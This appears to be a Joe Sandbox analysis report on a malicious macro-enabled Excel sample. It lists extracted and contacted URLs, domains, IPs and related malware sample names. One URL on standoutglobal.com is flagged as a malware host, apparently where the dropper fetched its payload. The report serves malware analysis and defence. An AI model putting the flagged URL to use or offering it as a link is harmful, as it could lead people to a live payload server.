    https://vendes.marketing/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=30%Avira URL Cloudsafe
    https://vendes.marketing/wp-includes/js/imagesloaded.min.js?ver=4.1.40%Avira URL Cloudsafe
    https://vendes.marketing/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fvendes.marketing%2F0%Avira URL Cloudsafe
    https://vendes.marketing/xmlrpc.php?rsd0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/uploads/2021/10/elementor.svg0%Avira URL Cloudsafe
    https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/inbound-marketi0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.4.80%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/themes/twentytwentyone/assets/css/ie.css?ver=1.40%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/js/v4-shims.min.js?ver0%Avira URL Cloudsafe
    https://vendes.marketing/feed/0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/uploads/images/caso-exito1.png0%Avira URL Cloudsafe
    https://vendes.marketing/agencia-de-marketing-digital/consultorias/consultoria-para-adsense/0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff2?5.10.0)0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/uploads/2021/10/apple_android.svg0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/all.min.css?ver=4.0%Avira URL Cloudsafe
    https://vendes.marketing/agencia-de-marketing-digital/ecommerce/emailing/0%Avira URL Cloudsafe
    https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/produccion-audiovisual/0%Avira URL Cloudsafe
    http://ocsp.entrust.net030%URL Reputationsafe
    http://schemas.openformatrg/package/2006/content-t0%URL Reputationsafe
    https://vendes.marketing/wp-content/uploads/2021/10/anuncios.png0%Avira URL Cloudsafe
    https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/tiendas-en-facebook-e-inst0%Avira URL Cloudsafe
    https://vendes.marketing/agencia-de-marketing-digital/ecommerce/0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/uploads/2021/10/marketing-digital-con-facebook.png0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.4.80%Avira URL Cloudsafe
    https://vendes.marketing/agencia-de-marketing-digital/ecommerce/pagos-online/0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/uploads/elementor/css/post-2017.css?ver=16382122820%Avira URL Cloudsafe
    https://vendes.marketing/agencia-de-marketing-digital/servicios-de-desarrollo-web/0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/uploads/2021/10/marketing-digital-con-youtube.png0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/uploads/images/comentario5-m.jpg0%Avira URL Cloudsafe
    https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/tienda-online-con-shopify/0%Avira URL Cloudsafe
    http://standoutglobal.com/2/MWpqeVgZ/1-48FD100%Avira URL Cloudmalware
    https://vendes.marketing/agencia-de-marketing-digital/consultorias/0%Avira URL Cloudsafe
    https://vendes.marketing/agencia-de-marketing-digital/consultorias/marketing-para-inmobiliarias-cons0%Avira URL Cloudsafe
    https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/diseno-grafico/0%Avira URL Cloudsafe
    https://vendes.marketing/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.20%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    standoutglobal.com
    		162.240.9.126
    		truefalseunknown
    vendes.marketing
    		107.180.46.229
    		truefalseunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://vendes.marketing/false
    • Avira URL Cloud: safe
    		unknown
    http://vendes.marketing/transmigrant/Wplzr/false
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://vendes.marketing/agencia-de-marketing-digital/ecommerce/conversion-rate-optimization/besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
    • Avira URL Cloud: safe
    		unknown
    https://vendes.marketing/wp-content/plugins/happy-elementor-addons/assets/fonts/style.min.css?ver=3.besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
    • Avira URL Cloud: safe
    		unknown
    https://vendes.marketing/wp-content/uploads/2021/10/framer.svgbesta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
    • Avira URL Cloud: safe
    		unknown
    https://vendes.marketing/wp-content/uploads/elementor/css/post-1522.css?ver=1638212153besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
    • Avira URL Cloud: safe
    		unknown
    http://standoutglobal.com/2/MWpqeVgZ/SoftwaEXCEL.EXE, 00000000.00000002.737128548.0000000004ED6000.00000004.00000001.sdmptrue
    • Avira URL Cloud: malware
    		unknown
    https://vendes.marketing/agencia-de-marketing-digital-en-cdmx/besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
    • Avira URL Cloud: safe
    		unknown
    https://vendes.marketing/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.svg?5.10.0#eicobesta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
    • Avira URL Cloud: safe
    		unknown
    https://vendes.marketing/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.4.8besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
    • Avira URL Cloud: safe
    		unknown
    https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/conversion-rate-optimizatibesta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
    • Avira URL Cloud: safe
    		unknown
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0EXCEL.EXE, 00000000.00000002.739976079.0000000005B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537069612.0000000005B5F000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://www.diginotar.nl/cps/pkioverheid0EXCEL.EXE, 00000000.00000002.739976079.0000000005B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537069612.0000000005B5F000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-300x102.pngbesta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
    • Avira URL Cloud: safe
    		unknown
    https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/diseno-web-ux/GSCXBEVV.htm.0.drfalse
    • Avira URL Cloud: safe
    		unknown
    https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/creacion-de-conGSCXBEVV.htm.0.drfalse
    • Avira URL Cloud: safe
    		unknown
    https://vendes.marketing/wp-content/uploads/2021/10/anuncios-300x270.pngbesta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
    • Avira URL Cloud: safe
    		unknown
    http://schemas.openEXCEL.EXE, 00000000.00000002.740262687.0000000007996000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.740096336.0000000006E36000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.740202968.00000000072A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.740233220.00000000078E6000.00000004.00000001.sdmpfalse
    • URL Reputation: safe
    		unknown
    https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/estrategias-en-GSCXBEVV.htm.0.drfalse
    • Avira URL Cloud: safe
    		unknown
    https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
    • Avira URL Cloud: safe
    		unknown
    https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/pagos-online/besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
    • Avira URL Cloud: safe
    		unknown
    https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/branding/GSCXBEVV.htm.0.drfalse
    • Avira URL Cloud: safe
    		unknown
    https://vendes.marketing/wp-content/uploads/images/comentario1.jpgbesta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
    • Avira URL Cloud: safe
    		unknown
    https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/fotografia-y-edicion/GSCXBEVV.htm.0.drfalse
    • Avira URL Cloud: safe
    		unknown
    https://connect.facebook.net/en_US/fbevents.jsbesta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
      		high
      https://vendes.marketing/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
      • Avira URL Cloud: safe
      		unknown
      http://standoutglobal.cEXCEL.EXE, 00000000.00000002.737971130.00000000056CB000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://vendes.marketing/blog/EXCEL.EXE, 00000000.00000003.537059494.0000000005BB8000.00000004.00000001.sdmp, besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
      • Avira URL Cloud: safe
      		unknown
      https://vendes.marketing/wp-content/uploads/2021/10/visual-Studio.svgbesta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
      • Avira URL Cloud: safe
      		unknown
      https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/publicidad-digiGSCXBEVV.htm.0.drfalse
      • Avira URL Cloud: safe
      		unknown
      https://vendes.marketing/comments/feed/besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
      • Avira URL Cloud: safe
      		unknown
      https://vendes.marketing/wp-includes/js/wp-embed.min.js?ver=5.8.2besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
      • Avira URL Cloud: safe
      		unknown
      https://s.w.org/images/core/emoji/13.1.0/svg/1f609.svgEXCEL.EXE, 00000000.00000003.537059494.0000000005BB8000.00000004.00000001.sdmp, besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
        		high
        https://vendes.marketing/wp-content/plugins/elementor-pro/assets/lib/smartmenus/jquery.smartmenus.mibesta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/tienda-online-con-magento/besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://vendes.marketing/agencia-de-marketing-digital/consultorias/marketing-para-el-sector-salud/EXCEL.EXE, 00000000.00000003.537059494.0000000005BB8000.00000004.00000001.sdmp, besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.csbesta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-1536x522.pngbesta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
        • Avira URL Cloud: safe
        		unknown
        http://www.windows.com/pctv.rundll32.exe, 00000004.00000002.477889247.0000000001F10000.00000002.00020000.sdmpfalse
          		high
          https://vendes.marketing/wp-includes/wlwmanifest.xmlbesta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://vendes.marketing/agencia-de-marketing-digital/servicios-de-desarrollo-web/automatizacion-de-GSCXBEVV.htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://schemas.openformatrg/drawml/2006/spreadsheetDEXCEL.EXE, 00000000.00000002.740202968.00000000072A6000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://vendes.marketing/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.4.8EXCEL.EXE, 00000000.00000003.537272193.0000000005BB1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537148185.0000000005B9C000.00000004.00000001.sdmp, besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://vendes.marketing/wp-content/uploads/2021/10/figma.svgbesta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://vendes.marketing/wp-content/uploads/2021/10/marketing-digital-con-instagram.pngbesta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://vendes.marketing/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.0.2besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://vendes.marketing/agencia-de-marketing-digital-en-monterrey/besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://vendes.marketing/nYEXCEL.EXE, 00000000.00000003.537240809.0000000005B21000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.739956925.0000000005B21000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://schema.orgbesta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
            		high
            https://vendes.marketing/agencia-de-marketing-digital/consultorias/consultoria-en-marketing-basado-ebesta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
            • Avira URL Cloud: safe
            		unknown
            http://windowsmedia.com/redir/services.asp?WMPFriendly=trueEXCEL.EXE, 00000000.00000002.737396730.00000000052D7000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.478045523.00000000020F7000.00000002.00020000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://vendes.marketing/agencia-de-marketing-digital/consultorias/auditorias-y-optimizacion-de-campbesta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
            • Avira URL Cloud: safe
            		unknown
            https://vendes.marketing/agencia-de-marketing-digital/servicios-de-desarrollo-web/desarrollo-de-megaGSCXBEVV.htm.0.drfalse
            • Avira URL Cloud: safe
            		unknown
            https://vendes.marketing/wp-content/uploads/elementor/css/post-2157.css?ver=1638212282besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
            • Avira URL Cloud: safe
            		unknown
            https://vendes.marketing/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js?ver=1.4besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
            • Avira URL Cloud: safe
            		unknown
            http://standoutglobal.coEXCEL.EXE, 00000000.00000002.737971130.00000000056CB000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://connect.facebook.net/es_LA/sdk/xfbml.customerchat.jsbesta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
              		high
              https://vendes.marketing/wp-content/plugins/elementor-pro/assets/lib/lottie/lottie.min.js?ver=5.6.6besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
              • Avira URL Cloud: safe
              		unknown
              https://vendes.marketing/wp-includes/css/dist/block-library/style.min.css?ver=5.8.2besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
              • Avira URL Cloud: safe
              		unknown
              http://schemas.openformatrg/package/2006/rEXCEL.EXE, 00000000.00000002.740262687.0000000007996000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.740233220.00000000078E6000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://vendes.marketing/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.EXCEL.EXE, 00000000.00000003.537272193.0000000005BB1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537148185.0000000005B9C000.00000004.00000001.sdmp, besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
              • Avira URL Cloud: safe
              		unknown
              https://vendes.marketing/agencia-de-marketing-digital/consultorias/digital-partner-incubadora-de-negEXCEL.EXE, 00000000.00000003.537059494.0000000005BB8000.00000004.00000001.sdmp, besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
              • Avira URL Cloud: safe
              		unknown
              https://vendes.marketing/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
              • Avira URL Cloud: safe
              		unknown
              https://vendes.marketing/wp-includes/js/imagesloaded.min.js?ver=4.1.4besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
              • Avira URL Cloud: safe
              		unknown
              https://vendes.marketing/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fvendes.marketing%2Fbesta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
              • Avira URL Cloud: safe
              		unknown
              https://vendes.marketing/xmlrpc.php?rsdbesta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
              • Avira URL Cloud: safe
              		unknown
              https://vendes.marketing/wp-content/uploads/2021/10/elementor.svgbesta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
              • Avira URL Cloud: safe
              		unknown
              https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/inbound-marketiGSCXBEVV.htm.0.drfalse
              • Avira URL Cloud: safe
              		unknown
              https://vendes.marketing/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.4.8EXCEL.EXE, 00000000.00000003.537272193.0000000005BB1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537148185.0000000005B9C000.00000004.00000001.sdmp, besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
              • Avira URL Cloud: safe
              		unknown
              https://vendes.marketing/wp-content/themes/twentytwentyone/assets/css/ie.css?ver=1.4besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
              • Avira URL Cloud: safe
              		unknown
              https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/js/v4-shims.min.js?verbesta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
              • Avira URL Cloud: safe
              		unknown
              https://www.thinkwithgoogle.com/intl/es-419/futuro-del-marketing/transformacion-digital/tiendas-omnibesta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
                		high
                https://vendes.marketing/feed/besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://vendes.marketing/wp-content/uploads/images/caso-exito1.pngbesta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
                • Avira URL Cloud: safe
                		unknown
                http://crl.entrust.net/2048ca.crl0EXCEL.EXE, 00000000.00000002.739976079.0000000005B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537069612.0000000005B5F000.00000004.00000001.sdmpfalse
                  		high
                  https://vendes.marketing/agencia-de-marketing-digital/consultorias/consultoria-para-adsense/besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://vendes.marketing/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff2?5.10.0)besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://vendes.marketing/wp-content/uploads/2021/10/apple_android.svgbesta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.msnbc.com/news/ticker.txtEXCEL.EXE, 00000000.00000002.737179895.00000000050F0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.477889247.0000000001F10000.00000002.00020000.sdmpfalse
                    		high
                    https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/all.min.css?ver=4.besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://vendes.marketing/agencia-de-marketing-digital/ecommerce/emailing/besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/produccion-audiovisual/GSCXBEVV.htm.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://ocsp.entrust.net03EXCEL.EXE, 00000000.00000002.739976079.0000000005B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.537069612.0000000005B5F000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.openformatrg/package/2006/content-tEXCEL.EXE, 00000000.00000002.740096336.0000000006E36000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://vendes.marketing/wp-content/uploads/2021/10/anuncios.pngGSCXBEVV.htm.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/tiendas-en-facebook-e-instbesta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://vendes.marketing/agencia-de-marketing-digital/ecommerce/besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://vendes.marketing/wp-content/uploads/2021/10/marketing-digital-con-facebook.pngbesta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://vendes.marketing/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.4.8besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://vendes.marketing/agencia-de-marketing-digital/ecommerce/pagos-online/besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://vendes.marketing/wp-content/uploads/elementor/css/post-2017.css?ver=1638212282besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://vendes.marketing/agencia-de-marketing-digital/servicios-de-desarrollo-web/besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://vendes.marketing/wp-content/uploads/2021/10/marketing-digital-con-youtube.pngbesta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://vendes.marketing/wp-content/uploads/images/comentario5-m.jpgbesta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/tienda-online-con-shopify/EXCEL.EXE, 00000000.00000003.537059494.0000000005BB8000.00000004.00000001.sdmp, besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://standoutglobal.com/2/MWpqeVgZ/1-48FDEXCEL.EXE, 00000000.00000002.737128548.0000000004ED6000.00000004.00000001.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://vendes.marketing/agencia-de-marketing-digital/consultorias/besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://vendes.marketing/agencia-de-marketing-digital/consultorias/marketing-para-inmobiliarias-consEXCEL.EXE, 00000000.00000003.537059494.0000000005BB8000.00000004.00000001.sdmp, besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/diseno-grafico/GSCXBEVV.htm.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://vendes.marketing/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2besta.ocx.0.dr, GSCXBEVV.htm.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    162.240.9.126
                    		standoutglobal.comUnited States
                    		46606UNIFIEDLAYER-AS-1USfalse
                    107.180.46.229
                    		vendes.marketingUnited States
                    		26496AS-26496-GO-DADDY-COM-LLCUSfalse

                    General Information

                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:532474
                    Start date:02.12.2021
                    Start time:10:15:31
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 5m 52s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:SCAN_7295943480515097.xlsm
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:6
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal76.expl.winXLSM@3/6@2/2
                    EGA Information:Failed
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 6
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .xlsm
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Found warning dialog
                    • Click Ok
                    • Attach to Office via COM
                    • Scroll down
                    • Close Viewer
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe
                    • Execution Graph export aborted for target EXCEL.EXE, PID 1348 because there are no executed function

                    Simulations

                    Behavior and APIs

                    No simulations

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    107.180.46.229Purchase Inquiry&Product Specification.exeGet hashmaliciousBrowse
                    • www.nihongo.school/cu6s/?u6utf=W50CE7q4q9oP7gRqIAd9YQ9RaMYKauZAxq11Ezs86ZRrs4WUxbwZ3395pe/S2qg7huHC&9rN46F=xVMHGdB8

                    Domains

                    No context

                    ASN

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    UNIFIEDLAYER-AS-1USINVOICE.exeGet hashmaliciousBrowse
                    • 162.214.80.6
                    img20048901738_Pago.pdf.exeGet hashmaliciousBrowse
                    • 192.185.115.3
                    PaCJ39hC4R.xlsxGet hashmaliciousBrowse
                    • 162.241.126.156
                    PaCJ39hC4R.xlsxGet hashmaliciousBrowse
                    • 162.241.126.156
                    New order documents. pdf..............exeGet hashmaliciousBrowse
                    • 108.179.232.76
                    part-1500645108.xlsbGet hashmaliciousBrowse
                    • 162.241.62.201
                    img20048901740_Pago.pdf.exeGet hashmaliciousBrowse
                    • 192.185.115.3
                    part-1500645108.xlsbGet hashmaliciousBrowse
                    • 162.241.62.201
                    shedy.exeGet hashmaliciousBrowse
                    • 162.241.218.172
                    product list.xlsxGet hashmaliciousBrowse
                    • 162.241.218.178
                    accounts...exeGet hashmaliciousBrowse
                    • 192.185.164.148
                    New product of Aluminium Profile.exeGet hashmaliciousBrowse
                    • 192.185.84.191
                    BL. AWSMUNDAR3606-21.exeGet hashmaliciousBrowse
                    • 162.241.148.56
                    draft_inv dec21.exeGet hashmaliciousBrowse
                    • 162.241.120.147
                    bank details.exeGet hashmaliciousBrowse
                    • 192.185.134.38
                    NEW INQUIRY ORDER.vbsGet hashmaliciousBrowse
                    • 192.185.29.73
                    Details.exeGet hashmaliciousBrowse
                    • 192.185.164.148
                    COMMERCIAL INVOICE AND BILL OF LANDING... 11232021.exeGet hashmaliciousBrowse
                    • 192.185.84.191
                    counter-119221000.xlsGet hashmaliciousBrowse
                    • 108.179.192.98
                    counter-119221000.xlsGet hashmaliciousBrowse
                    • 108.179.192.98
                    AS-26496-GO-DADDY-COM-LLCUSPAYMENT PROOF.exeGet hashmaliciousBrowse
                    • 160.153.63.160
                    TT swift copy.exeGet hashmaliciousBrowse
                    • 148.66.138.249
                    DHL DOCUMENT FOR #504.exeGet hashmaliciousBrowse
                    • 72.167.241.180
                    Purchase order.exeGet hashmaliciousBrowse
                    • 148.66.138.249
                    swift copy.exeGet hashmaliciousBrowse
                    • 160.153.63.160
                    print_01.exeGet hashmaliciousBrowse
                    • 107.180.56.180
                    New order.exeGet hashmaliciousBrowse
                    • 148.66.138.249
                    PO_30-11-2021.xlsxGet hashmaliciousBrowse
                    • 166.62.110.60
                    New order.exeGet hashmaliciousBrowse
                    • 148.66.138.249
                    ORDEN DE COMPRA (2).exeGet hashmaliciousBrowse
                    • 107.180.88.78
                    remitted payment.exeGet hashmaliciousBrowse
                    • 160.153.63.160
                    ORDEN DE COMPRA (2).exeGet hashmaliciousBrowse
                    • 107.180.88.78
                    ABONOF2201_exe.exeGet hashmaliciousBrowse
                    • 107.180.56.180
                    request quotation.exeGet hashmaliciousBrowse
                    • 107.180.38.104
                    Linux_amd64Get hashmaliciousBrowse
                    • 160.153.92.132
                    cT69PbT3G6.exeGet hashmaliciousBrowse
                    • 107.180.51.79
                    PURCHASED ORDER CONFIRMATION UGANDA.xlsxGet hashmaliciousBrowse
                    • 148.72.214.23
                    swift copy.exeGet hashmaliciousBrowse
                    • 160.153.63.160
                    New order.exeGet hashmaliciousBrowse
                    • 148.66.138.249
                    payment advice_29011021.exeGet hashmaliciousBrowse
                    • 166.62.110.60

                    JA3 Fingerprints

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    7dcce5b76c8b17472d024758970a406bHotel Guest List.ppamGet hashmaliciousBrowse
                    • 107.180.46.229
                    IRQ2107798.ppamGet hashmaliciousBrowse
                    • 107.180.46.229
                    AWB.ppamGet hashmaliciousBrowse
                    • 107.180.46.229
                    FILE_915494026923219.xlsmGet hashmaliciousBrowse
                    • 107.180.46.229
                    IRQ2107797.ppamGet hashmaliciousBrowse
                    • 107.180.46.229
